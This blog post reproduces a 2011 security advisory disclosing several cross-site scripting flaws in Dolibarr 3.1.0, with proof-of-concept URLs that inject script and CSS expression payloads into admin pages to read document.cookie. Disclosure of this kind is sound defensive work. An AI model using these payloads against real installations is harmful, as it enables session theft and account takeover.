Nov 10: INFOSERVE-ADV2011-03 - Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
Trackbacks
Trackback-URL für diesen Eintrag
Keine Trackbacks
Advisory:
|
Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
|
Advisory ID:
|
INFOSERVE-ADV2011-03
|
Author:
|
Stefan Schurtz
|
Contact:
|
|
Affected Software:
|
Successfully tested on Dolibarr 3.1.0 other versions may also be affected
|
Vendor URL:
|
|
Vendor Status:
|
fixed in the 3.1 branch
|
http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username=’"</script><script>alert(document.cookie)</script>
http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username=’"</script><script>alert(document.cookie)</script>&=3&optioncss=print |
http://<target>/admin/security_other.php/" stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/events.php/" stYle="x:expre/**/ssion(alert(document.cookie)) http://<target>/admin/user.php/" stYle="x:expre/**/ssion(alert(document.cookie)) |
![]() |
December '19 | |||||
Mo | Tu | We | Th | Fr | Sa | Su |
1 | ||||||
2 | 3 | 4 | 5 | 6 | 7 | 8 |
9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 | 17 | 18 | 19 | 20 | 21 | 22 |
23 | 24 | 25 | 26 | 27 | 28 | 29 |
30 | 31 |
Layout by Andreas Viklund | Serendipity template by Carl